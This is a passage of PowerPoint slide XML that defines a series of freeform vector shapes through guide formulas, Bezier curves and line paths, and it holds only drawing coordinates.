                        <a:pt x="5" y="168"/>
                        <a:pt x="0" y="77"/>
                        <a:pt x="51" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="101" y="0"/>
                        <a:pt x="188" y="29"/>
                        <a:pt x="245" y="103"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="301" y="178"/>
                        <a:pt x="306" y="269"/>
                        <a:pt x="255" y="30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28" name="Freeform 14789"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4835" y="2934"/>
                  <a:ext cx="86" cy="97"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 155 w 186"/>
                    <a:gd name="T1" fmla="*/ 187 h 210"/>
                    <a:gd name="T2" fmla="*/ 37 w 186"/>
                    <a:gd name="T3" fmla="*/ 147 h 210"/>
                    <a:gd name="T4" fmla="*/ 31 w 186"/>
                    <a:gd name="T5" fmla="*/ 23 h 210"/>
                    <a:gd name="T6" fmla="*/ 149 w 186"/>
                    <a:gd name="T7" fmla="*/ 63 h 210"/>
                    <a:gd name="T8" fmla="*/ 155 w 186"/>
                    <a:gd name="T9" fmla="*/ 187 h 2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6"/>
                    <a:gd name="T16" fmla="*/ 0 h 210"/>
                    <a:gd name="T17" fmla="*/ 186 w 186"/>
                    <a:gd name="T18" fmla="*/ 210 h 21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6" h="210">
                      <a:moveTo>
                        <a:pt x="155" y="187"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="124" y="210"/>
                        <a:pt x="72" y="193"/>
                        <a:pt x="37" y="147"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="102"/>
                        <a:pt x="0" y="47"/>
                        <a:pt x="31" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="0"/>
                        <a:pt x="114" y="17"/>
                        <a:pt x="149" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="183" y="108"/>
                        <a:pt x="186" y="164"/>
                        <a:pt x="155" y="18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Freeform 14790"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4988" y="2938"/>
                  <a:ext cx="139" cy="152"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 241 w 303"/>
                    <a:gd name="T1" fmla="*/ 96 h 332"/>
                    <a:gd name="T2" fmla="*/ 66 w 303"/>
                    <a:gd name="T3" fmla="*/ 21 h 332"/>
                    <a:gd name="T4" fmla="*/ 66 w 303"/>
                    <a:gd name="T5" fmla="*/ 20 h 332"/>
                    <a:gd name="T6" fmla="*/ 17 w 303"/>
                    <a:gd name="T7" fmla="*/ 33 h 332"/>
                    <a:gd name="T8" fmla="*/ 27 w 303"/>
                    <a:gd name="T9" fmla="*/ 55 h 332"/>
                    <a:gd name="T10" fmla="*/ 58 w 303"/>
                    <a:gd name="T11" fmla="*/ 235 h 332"/>
                    <a:gd name="T12" fmla="*/ 143 w 303"/>
                    <a:gd name="T13" fmla="*/ 305 h 332"/>
                    <a:gd name="T14" fmla="*/ 156 w 303"/>
                    <a:gd name="T15" fmla="*/ 332 h 332"/>
                    <a:gd name="T16" fmla="*/ 221 w 303"/>
                    <a:gd name="T17" fmla="*/ 315 h 332"/>
                    <a:gd name="T18" fmla="*/ 221 w 303"/>
                    <a:gd name="T19" fmla="*/ 315 h 332"/>
                    <a:gd name="T20" fmla="*/ 252 w 303"/>
                    <a:gd name="T21" fmla="*/ 300 h 332"/>
                    <a:gd name="T22" fmla="*/ 241 w 303"/>
                    <a:gd name="T23" fmla="*/ 96 h 33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03"/>
                    <a:gd name="T37" fmla="*/ 0 h 332"/>
                    <a:gd name="T38" fmla="*/ 303 w 303"/>
                    <a:gd name="T39" fmla="*/ 332 h 332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03" h="332">
                      <a:moveTo>
                        <a:pt x="241" y="96"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="191" y="30"/>
                        <a:pt x="117" y="0"/>
                        <a:pt x="66" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="20"/>
                        <a:pt x="66" y="20"/>
                        <a:pt x="66" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="33"/>
                        <a:pt x="17" y="33"/>
                        <a:pt x="17" y="33"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="55"/>
                        <a:pt x="27" y="55"/>
                        <a:pt x="27" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="100"/>
                        <a:pt x="11" y="173"/>
                        <a:pt x="58" y="235"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="82" y="267"/>
                        <a:pt x="113" y="291"/>
                        <a:pt x="143" y="305"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="156" y="332"/>
                        <a:pt x="156" y="332"/>
                        <a:pt x="156" y="332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32" y="312"/>
                        <a:pt x="243" y="307"/>
                        <a:pt x="252" y="300"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="303" y="262"/>
                        <a:pt x="298" y="170"/>
                        <a:pt x="241" y="96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Freeform 14791"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4957" y="2942"/>
                  <a:ext cx="141" cy="159"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 255 w 306"/>
                    <a:gd name="T1" fmla="*/ 307 h 346"/>
                    <a:gd name="T2" fmla="*/ 61 w 306"/>
                    <a:gd name="T3" fmla="*/ 242 h 346"/>
                    <a:gd name="T4" fmla="*/ 51 w 306"/>
                    <a:gd name="T5" fmla="*/ 38 h 346"/>
                    <a:gd name="T6" fmla="*/ 245 w 306"/>
                    <a:gd name="T7" fmla="*/ 103 h 346"/>
                    <a:gd name="T8" fmla="*/ 255 w 306"/>
                    <a:gd name="T9" fmla="*/ 307 h 34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346"/>
                    <a:gd name="T17" fmla="*/ 306 w 306"/>
                    <a:gd name="T18" fmla="*/ 346 h 34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346">
                      <a:moveTo>
                        <a:pt x="255" y="307"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="205" y="346"/>
                        <a:pt x="118" y="317"/>
                        <a:pt x="61" y="242"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="168"/>
                        <a:pt x="0" y="77"/>
                        <a:pt x="51" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="101" y="0"/>
                        <a:pt x="188" y="29"/>
                        <a:pt x="245" y="103"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="301" y="177"/>
                        <a:pt x="306" y="269"/>
                        <a:pt x="255" y="307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31" name="Freeform 14792"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4985" y="2973"/>
                  <a:ext cx="85" cy="97"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 155 w 186"/>
                    <a:gd name="T1" fmla="*/ 188 h 211"/>
                    <a:gd name="T2" fmla="*/ 37 w 186"/>
                    <a:gd name="T3" fmla="*/ 148 h 211"/>
                    <a:gd name="T4" fmla="*/ 31 w 186"/>
                    <a:gd name="T5" fmla="*/ 24 h 211"/>
                    <a:gd name="T6" fmla="*/ 149 w 186"/>
                    <a:gd name="T7" fmla="*/ 63 h 211"/>
                    <a:gd name="T8" fmla="*/ 155 w 186"/>
                    <a:gd name="T9" fmla="*/ 188 h 2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6"/>
                    <a:gd name="T16" fmla="*/ 0 h 211"/>
                    <a:gd name="T17" fmla="*/ 186 w 186"/>
                    <a:gd name="T18" fmla="*/ 211 h 2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6" h="211">
                      <a:moveTo>
                        <a:pt x="155" y="188"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="125" y="211"/>
                        <a:pt x="72" y="193"/>
                        <a:pt x="37" y="148"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="103"/>
                        <a:pt x="0" y="47"/>
                        <a:pt x="31" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="0"/>
                        <a:pt x="114" y="18"/>
                        <a:pt x="149" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="183" y="109"/>
                        <a:pt x="186" y="164"/>
                        <a:pt x="155" y="18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32" name="Freeform 14793"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5064" y="2959"/>
                  <a:ext cx="95" cy="104"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 184 w 207"/>
                    <a:gd name="T1" fmla="*/ 83 h 227"/>
                    <a:gd name="T2" fmla="*/ 143 w 207"/>
                    <a:gd name="T3" fmla="*/ 38 h 227"/>
                    <a:gd name="T4" fmla="*/ 0 w 207"/>
                    <a:gd name="T5" fmla="*/ 0 h 227"/>
                    <a:gd name="T6" fmla="*/ 42 w 207"/>
                    <a:gd name="T7" fmla="*/ 45 h 227"/>
                    <a:gd name="T8" fmla="*/ 101 w 207"/>
                    <a:gd name="T9" fmla="*/ 227 h 227"/>
                    <a:gd name="T10" fmla="*/ 101 w 207"/>
                    <a:gd name="T11" fmla="*/ 227 h 227"/>
                    <a:gd name="T12" fmla="*/ 185 w 207"/>
                    <a:gd name="T13" fmla="*/ 205 h 227"/>
                    <a:gd name="T14" fmla="*/ 185 w 207"/>
                    <a:gd name="T15" fmla="*/ 205 h 227"/>
                    <a:gd name="T16" fmla="*/ 205 w 207"/>
                    <a:gd name="T17" fmla="*/ 199 h 227"/>
                    <a:gd name="T18" fmla="*/ 184 w 207"/>
                    <a:gd name="T19" fmla="*/ 83 h 2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07"/>
                    <a:gd name="T31" fmla="*/ 0 h 227"/>
                    <a:gd name="T32" fmla="*/ 207 w 207"/>
                    <a:gd name="T33" fmla="*/ 227 h 2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07" h="227">
                      <a:moveTo>
                        <a:pt x="184" y="83"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="174" y="64"/>
                        <a:pt x="167" y="45"/>
                        <a:pt x="143" y="38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" y="13"/>
                        <a:pt x="29" y="28"/>
                        <a:pt x="42" y="45"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="87" y="104"/>
                        <a:pt x="107" y="172"/>
                        <a:pt x="101" y="227"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="101" y="227"/>
                        <a:pt x="101" y="227"/>
                        <a:pt x="101" y="227"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="185" y="205"/>
                        <a:pt x="185" y="205"/>
                        <a:pt x="185" y="205"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="185" y="205"/>
                        <a:pt x="185" y="205"/>
                        <a:pt x="185" y="205"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="205" y="199"/>
                        <a:pt x="205" y="199"/>
                        <a:pt x="205" y="199"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="205" y="158"/>
                        <a:pt x="207" y="128"/>
                        <a:pt x="184" y="8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33" name="Freeform 14794"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5110" y="2954"/>
                  <a:ext cx="379" cy="102"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 610 w 1952"/>
                    <a:gd name="T1" fmla="*/ 522 h 522"/>
                    <a:gd name="T2" fmla="*/ 0 w 1952"/>
                    <a:gd name="T3" fmla="*/ 359 h 522"/>
                    <a:gd name="T4" fmla="*/ 1344 w 1952"/>
                    <a:gd name="T5" fmla="*/ 0 h 522"/>
                    <a:gd name="T6" fmla="*/ 1952 w 1952"/>
                    <a:gd name="T7" fmla="*/ 154 h 522"/>
                    <a:gd name="T8" fmla="*/ 610 w 1952"/>
                    <a:gd name="T9" fmla="*/ 522 h 5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52"/>
                    <a:gd name="T16" fmla="*/ 0 h 522"/>
                    <a:gd name="T17" fmla="*/ 1952 w 1952"/>
                    <a:gd name="T18" fmla="*/ 522 h 5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52" h="522">
                      <a:moveTo>
                        <a:pt x="610" y="522"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="359"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1344" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1952" y="154"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="610" y="52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34" name="Freeform 14795"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5110" y="3024"/>
                  <a:ext cx="118" cy="71"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 610"/>
                    <a:gd name="T1" fmla="*/ 0 h 362"/>
                    <a:gd name="T2" fmla="*/ 0 w 610"/>
                    <a:gd name="T3" fmla="*/ 199 h 362"/>
                    <a:gd name="T4" fmla="*/ 610 w 610"/>
                    <a:gd name="T5" fmla="*/ 362 h 362"/>
                    <a:gd name="T6" fmla="*/ 610 w 610"/>
                    <a:gd name="T7" fmla="*/ 163 h 362"/>
                    <a:gd name="T8" fmla="*/ 0 w 610"/>
                    <a:gd name="T9" fmla="*/ 0 h 3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10"/>
                    <a:gd name="T16" fmla="*/ 0 h 362"/>
                    <a:gd name="T17" fmla="*/ 610 w 610"/>
                    <a:gd name="T18" fmla="*/ 362 h 36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10" h="362">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="610" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="610" y="1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35" name="Freeform 14796"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5101" y="2985"/>
                  <a:ext cx="145" cy="109"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 315 w 315"/>
                    <a:gd name="T1" fmla="*/ 56 h 238"/>
                    <a:gd name="T2" fmla="*/ 140 w 315"/>
                    <a:gd name="T3" fmla="*/ 9 h 238"/>
                    <a:gd name="T4" fmla="*/ 37 w 315"/>
                    <a:gd name="T5" fmla="*/ 57 h 238"/>
                    <a:gd name="T6" fmla="*/ 31 w 315"/>
                    <a:gd name="T7" fmla="*/ 181 h 238"/>
                    <a:gd name="T8" fmla="*/ 52 w 315"/>
                    <a:gd name="T9" fmla="*/ 190 h 238"/>
                    <a:gd name="T10" fmla="*/ 230 w 315"/>
                    <a:gd name="T11" fmla="*/ 238 h 238"/>
                    <a:gd name="T12" fmla="*/ 315 w 315"/>
                    <a:gd name="T13" fmla="*/ 56 h 23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15"/>
                    <a:gd name="T22" fmla="*/ 0 h 238"/>
                    <a:gd name="T23" fmla="*/ 315 w 315"/>
                    <a:gd name="T24" fmla="*/ 238 h 23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15" h="238">
                      <a:moveTo>
                        <a:pt x="315" y="56"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="9"/>
                        <a:pt x="140" y="9"/>
                        <a:pt x="140" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="109" y="0"/>
                        <a:pt x="67" y="18"/>
                        <a:pt x="37" y="57"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="102"/>
                        <a:pt x="0" y="157"/>
                        <a:pt x="31" y="181"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="37" y="186"/>
                        <a:pt x="44" y="189"/>
                        <a:pt x="52" y="190"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="230" y="238"/>
                        <a:pt x="230" y="238"/>
                        <a:pt x="230" y="238"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="315" y="5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36" name="Freeform 14797"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5183" y="3004"/>
                  <a:ext cx="85" cy="96"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 31 w 186"/>
                    <a:gd name="T1" fmla="*/ 188 h 211"/>
                    <a:gd name="T2" fmla="*/ 149 w 186"/>
                    <a:gd name="T3" fmla="*/ 148 h 211"/>
                    <a:gd name="T4" fmla="*/ 155 w 186"/>
                    <a:gd name="T5" fmla="*/ 24 h 211"/>
                    <a:gd name="T6" fmla="*/ 37 w 186"/>
                    <a:gd name="T7" fmla="*/ 63 h 211"/>
                    <a:gd name="T8" fmla="*/ 31 w 186"/>
                    <a:gd name="T9" fmla="*/ 188 h 2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6"/>
                    <a:gd name="T16" fmla="*/ 0 h 211"/>
                    <a:gd name="T17" fmla="*/ 186 w 186"/>
                    <a:gd name="T18" fmla="*/ 211 h 2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6" h="211">
                      <a:moveTo>
                        <a:pt x="31" y="188"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="211"/>
                        <a:pt x="115" y="193"/>
                        <a:pt x="149" y="148"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="183" y="103"/>
                        <a:pt x="186" y="47"/>
                        <a:pt x="155" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="125" y="0"/>
                        <a:pt x="72" y="18"/>
                        <a:pt x="37" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="109"/>
                        <a:pt x="0" y="164"/>
                        <a:pt x="31" y="18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37" name="Freeform 14798"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4094" y="2385"/>
                  <a:ext cx="1046" cy="594"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 5383"/>
                    <a:gd name="T1" fmla="*/ 1613 h 3059"/>
                    <a:gd name="T2" fmla="*/ 5383 w 5383"/>
                    <a:gd name="T3" fmla="*/ 3059 h 3059"/>
                    <a:gd name="T4" fmla="*/ 5383 w 5383"/>
                    <a:gd name="T5" fmla="*/ 1445 h 3059"/>
                    <a:gd name="T6" fmla="*/ 0 w 5383"/>
                    <a:gd name="T7" fmla="*/ 0 h 3059"/>
                    <a:gd name="T8" fmla="*/ 0 w 5383"/>
                    <a:gd name="T9" fmla="*/ 1613 h 30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383"/>
                    <a:gd name="T16" fmla="*/ 0 h 3059"/>
                    <a:gd name="T17" fmla="*/ 5383 w 5383"/>
                    <a:gd name="T18" fmla="*/ 3059 h 30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383" h="3059">
                      <a:moveTo>
                        <a:pt x="0" y="1613"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="5383" y="3059"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5383" y="1445"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1613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38" name="Freeform 14799"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4094" y="2291"/>
                  <a:ext cx="1396" cy="375"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1798 w 7181"/>
                    <a:gd name="T1" fmla="*/ 0 h 1927"/>
                    <a:gd name="T2" fmla="*/ 0 w 7181"/>
                    <a:gd name="T3" fmla="*/ 482 h 1927"/>
                    <a:gd name="T4" fmla="*/ 5383 w 7181"/>
                    <a:gd name="T5" fmla="*/ 1927 h 1927"/>
                    <a:gd name="T6" fmla="*/ 7181 w 7181"/>
                    <a:gd name="T7" fmla="*/ 1445 h 1927"/>
                    <a:gd name="T8" fmla="*/ 1798 w 7181"/>
                    <a:gd name="T9" fmla="*/ 0 h 19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181"/>
                    <a:gd name="T16" fmla="*/ 0 h 1927"/>
                    <a:gd name="T17" fmla="*/ 7181 w 7181"/>
                    <a:gd name="T18" fmla="*/ 1927 h 19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181" h="1927">
                      <a:moveTo>
                        <a:pt x="1798" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="482"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5383" y="1927"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="7181" y="1445"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1798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39" name="Freeform 14800"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5140" y="2572"/>
                  <a:ext cx="350" cy="407"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1798"/>
                    <a:gd name="T1" fmla="*/ 2096 h 2096"/>
                    <a:gd name="T2" fmla="*/ 1798 w 1798"/>
                    <a:gd name="T3" fmla="*/ 1611 h 2096"/>
                    <a:gd name="T4" fmla="*/ 1798 w 1798"/>
                    <a:gd name="T5" fmla="*/ 0 h 2096"/>
                    <a:gd name="T6" fmla="*/ 0 w 1798"/>
                    <a:gd name="T7" fmla="*/ 482 h 2096"/>
                    <a:gd name="T8" fmla="*/ 0 w 1798"/>
                    <a:gd name="T9" fmla="*/ 2096 h 20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8"/>
                    <a:gd name="T16" fmla="*/ 0 h 2096"/>
                    <a:gd name="T17" fmla="*/ 1798 w 1798"/>
                    <a:gd name="T18" fmla="*/ 2096 h 209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8" h="2096">
                      <a:moveTo>
                        <a:pt x="0" y="2096"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="1798" y="1611"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1798" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="482"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="209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40" name="Freeform 14801"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5231" y="2537"/>
                  <a:ext cx="47" cy="152"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 103 w 103"/>
                    <a:gd name="T1" fmla="*/ 83 h 331"/>
                    <a:gd name="T2" fmla="*/ 19 w 103"/>
                    <a:gd name="T3" fmla="*/ 0 h 331"/>
                    <a:gd name="T4" fmla="*/ 18 w 103"/>
                    <a:gd name="T5" fmla="*/ 0 h 331"/>
                    <a:gd name="T6" fmla="*/ 4 w 103"/>
                    <a:gd name="T7" fmla="*/ 25 h 331"/>
                    <a:gd name="T8" fmla="*/ 3 w 103"/>
                    <a:gd name="T9" fmla="*/ 55 h 331"/>
                    <a:gd name="T10" fmla="*/ 5 w 103"/>
                    <a:gd name="T11" fmla="*/ 55 h 331"/>
                    <a:gd name="T12" fmla="*/ 46 w 103"/>
                    <a:gd name="T13" fmla="*/ 110 h 331"/>
                    <a:gd name="T14" fmla="*/ 46 w 103"/>
                    <a:gd name="T15" fmla="*/ 110 h 331"/>
                    <a:gd name="T16" fmla="*/ 46 w 103"/>
                    <a:gd name="T17" fmla="*/ 112 h 331"/>
                    <a:gd name="T18" fmla="*/ 46 w 103"/>
                    <a:gd name="T19" fmla="*/ 162 h 331"/>
                    <a:gd name="T20" fmla="*/ 46 w 103"/>
                    <a:gd name="T21" fmla="*/ 323 h 331"/>
                    <a:gd name="T22" fmla="*/ 74 w 103"/>
                    <a:gd name="T23" fmla="*/ 331 h 331"/>
                    <a:gd name="T24" fmla="*/ 103 w 103"/>
                    <a:gd name="T25" fmla="*/ 323 h 331"/>
                    <a:gd name="T26" fmla="*/ 103 w 103"/>
                    <a:gd name="T27" fmla="*/ 110 h 331"/>
                    <a:gd name="T28" fmla="*/ 103 w 103"/>
                    <a:gd name="T29" fmla="*/ 83 h 33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3"/>
                    <a:gd name="T46" fmla="*/ 0 h 331"/>
                    <a:gd name="T47" fmla="*/ 103 w 103"/>
                    <a:gd name="T48" fmla="*/ 331 h 33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3" h="331">
                      <a:moveTo>
                        <a:pt x="103" y="83"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="103" y="37"/>
                        <a:pt x="65" y="0"/>
                        <a:pt x="19" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="0"/>
                        <a:pt x="18" y="0"/>
                        <a:pt x="18" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="1"/>
                        <a:pt x="8" y="12"/>
                        <a:pt x="4" y="25"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="40"/>
                        <a:pt x="0" y="52"/>
                        <a:pt x="3" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="55"/>
                        <a:pt x="5" y="55"/>
                        <a:pt x="5" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29" y="62"/>
                        <a:pt x="46" y="84"/>
                        <a:pt x="46" y="110"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="110"/>
                        <a:pt x="46" y="110"/>
                        <a:pt x="46" y="110"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="111"/>
                        <a:pt x="46" y="111"/>
                        <a:pt x="46" y="112"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="162"/>
                        <a:pt x="46" y="162"/>
                        <a:pt x="46" y="162"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="323"/>
                        <a:pt x="46" y="323"/>
                        <a:pt x="46" y="323"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="328"/>
                        <a:pt x="59" y="331"/>
                        <a:pt x="74" y="331"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="90" y="331"/>
                        <a:pt x="103" y="328"/>
                        <a:pt x="103" y="323"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="103" y="110"/>
                        <a:pt x="103" y="110"/>
                        <a:pt x="103" y="110"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="103" y="110"/>
                        <a:pt x="103" y="93"/>
                        <a:pt x="103" y="8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41" name="Freeform 14802"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5228" y="3082"/>
                  <a:ext cx="235" cy="63"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 959 w 1207"/>
                    <a:gd name="T1" fmla="*/ 326 h 326"/>
                    <a:gd name="T2" fmla="*/ 0 w 1207"/>
                    <a:gd name="T3" fmla="*/ 67 h 326"/>
                    <a:gd name="T4" fmla="*/ 248 w 1207"/>
                    <a:gd name="T5" fmla="*/ 0 h 326"/>
                    <a:gd name="T6" fmla="*/ 1207 w 1207"/>
                    <a:gd name="T7" fmla="*/ 251 h 326"/>
                    <a:gd name="T8" fmla="*/ 959 w 1207"/>
                    <a:gd name="T9" fmla="*/ 326 h 3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07"/>
                    <a:gd name="T16" fmla="*/ 0 h 326"/>
                    <a:gd name="T17" fmla="*/ 1207 w 1207"/>
                    <a:gd name="T18" fmla="*/ 326 h 3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07" h="326">
                      <a:moveTo>
                        <a:pt x="959" y="326"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="67"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="248" y="0"/>
